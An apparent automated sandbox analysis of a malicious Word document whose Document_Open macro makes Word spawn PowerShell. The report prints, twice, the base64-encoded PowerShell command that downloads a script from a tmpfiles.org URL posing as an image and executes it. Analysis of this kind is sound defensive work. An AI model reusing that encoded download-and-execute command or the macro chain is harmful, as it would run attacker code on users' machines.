tmpfiles_session=eyJpdiI6ImpYRmVGUmhaUk5MYUsyWENUazhjQ0E9PSIsInZhbHVlIjoiT3RBMERGQjlIZDdVT3RNZC9qdVltVjgxY2U1OG5abG9mS2I3VXhzNlVyM20zYXM3Y2JLazY4WTJ0REpMTGFUWk1EZUxxWm9DaXVUU3RHYkpCZ3RtTWV4Y2JaZlhUNlJvTWQ5dW9OUWRWeFdNeTFPdDZOejJpY2ppamp1TVJHdEYiLCJtYWMiOiJjMGRjY2RhNjczMWVkY2RhMGQ0YTc2ODkyMGZjZGJlYTVjNWUyZjY3MDI5NzdhMzExZjk4NGRlZmExNGQzZTczIn0%3D; expires=Wed, 01-Jan-2025 18:20:31 GMT; Max-Age=7200; path=/; httponly; samesite=laxReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvnI1siVhe%2FYN0il8eoEss2DGDEb1rUqwuETgaf%2FW%2B%2B6skOqmyagABnG%2BvEgBr%2FWjkkvmpjmQ2Kdju0dNxJ1YNTYWoOjlOcuhkl7iAXdo8BvcsH2ylg%2Bl7NC%2FSI2DoI%3D"}],"group":"cf-nel","max_age":604800}

Source: powershell.exe, 00000006.00000002.2132433413.0000000004C69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000006.00000002.2132433413.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2132433413.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=Nunito&display=swap
Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.2132433413.0000000004F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org
Source: powershell.exe, 00000006.00000002.2132433413.0000000004771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:49712 version: TLS 1.2

System Summary

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: test.doc.bin.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Source: test.doc.bin.doc	OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal96.expl.evad.winDOC@5/14@1/1

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$st.doc.bin.doc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{CD88CE7E-6C7B-47BF-8ECC-B5C5F8DA7A0A} - OProcSessId.dat

Jump to behavior

Source: test.doc.bin.doc	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true

Source: test.doc.bin.doc	OLE document summary: title field not present or empty
Source: test.doc.bin.doc	OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: test.doc.bin.doc	Virustotal: Detection: 50%
Source: test.doc.bin.doc	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: test.doc.bin.doc	Initial sample: OLE summary codepage = 1200
Source: test.doc.bin.doc	Initial sample: OLE document summary codepagedoc = 1200

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2131528419.0000000002633000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.pdbnProvider,Sy source: powershell.exe, 00000006.00000002.2131528419.0000000002633000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04673DF0 push eax; iretd	6_2_04673DF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04670F63 push eax; ret	6_2_04670F8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04670F20 push eax; ret	6_2_04670F3A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04670FA0 push eax; ret	6_2_04670FAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04670FB0 push eax; ret	6_2_04670FBA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04670F90 push eax; ret	6_2_04670F9A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_046733C0 push eax; retf	6_2_046733D9

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
